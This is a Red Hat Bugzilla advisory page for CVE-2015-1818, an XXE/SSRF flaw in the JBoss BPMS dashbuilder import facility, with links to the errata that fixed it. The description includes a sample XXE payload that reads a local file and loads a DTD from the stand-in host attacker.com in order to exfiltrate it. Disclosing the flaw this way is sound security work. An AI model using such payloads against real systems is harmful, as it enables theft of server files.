1201714 – (CVE-2015-1818) CVE-2015-1818 dashbuilder: XXE/SSRF vulnerability

Bug 1201714 (CVE-2015-1818) - CVE-2015-1818 dashbuilder: XXE/SSRF vulnerability

Summary: CVE-2015-1818 dashbuilder: XXE/SSRF vulnerability

Keywords:
Status:	CLOSED ERRATA
Alias:	CVE-2015-1818
Product:	Security Response
Classification:	Other
Component:	vulnerability
Sub Component:
Version:	unspecified
Hardware:	All
OS:	Linux
Priority:	medium
Severity:	medium
Target Milestone:	---
Assignee:	Red Hat Product Security
QA Contact:
Docs Contact:
URL:
Whiteboard:
Depends On:	1211315 1211316 1211317 1211318 1211319 1211320 1246170
Blocks:	1201717 1244364 1244365
TreeView+	depends on / blocked

Reported:	2015-03-13 10:25 UTC by Martin Prpič
Modified:	2023-05-12 07:37 UTC (History)
CC List:	12 users (show)
Fixed In Version:
Clone Of:
Environment:
Last Closed:	2019-06-08 02:39:34 UTC
Embargoed:

Attachments	(Terms of Use)

Links
System	ID	Private	Priority	Status	Summary	Last Updated
Red Hat Product Errata	RHSA-2015:1539	0	normal	SHIPPED_LIVE	Moderate: Red Hat JBoss BPM Suite 6.1.2 update	2015-08-03 23:41:04 UTC
Red Hat Product Errata	RHSA-2015:1704	0	normal	SHIPPED_LIVE	Moderate: Red Hat JBoss Data Virtualization 6.1.0 security update	2015-09-02 20:28:06 UTC

Description Martin Prpič 2015-03-13 10:25:08 UTC

A flaw was found in the dashbuilder import facility of JBoss BPMS 6: the DocumentBuilders instantiated in org.jboss.dashboard.export.ImportManagerImpl do not disable external entities.

This could allow an attacker to perform a variate of XXE/SSRF attacks. Exfiltrating data using a general entity attack is not obviously possible, but standard parameter entity exfiltration techniques will work.

For example, importing the following file:

<!DOCTYPE foo [
<!ENTITY % file SYSTEM "file:///tmp/loot.txt">
<!ENTITY % dtd SYSTEM "http://attacker.com/send.dtd">
%dtd;
%send;
]]>
<doc>bar</doc>

causes Send.dtd to be retrieved, and loot.txt to be exfiltrated if send.dtd contains the appropriate content.

Acknowledgements:

Red Hat would like to thank David Jorm of IIX Product Security for reporting this issue.

Comment 4 errata-xmlrpc 2015-08-03 19:41:16 UTC

This issue has been addressed in the following products:

  JBoss BPM Suite 6.1.2

Via RHSA-2015:1539 https://rhn.redhat.com/errata/RHSA-2015-1539.html

Comment 5 errata-xmlrpc 2015-09-02 16:28:20 UTC

This issue has been addressed in the following products:

  JBoss Data Virtualization 6.1.0

Via RHSA-2015:1704 https://rhn.redhat.com/errata/RHSA-2015-1704.html

Note You need to log in before you can comment on or make changes to this bug.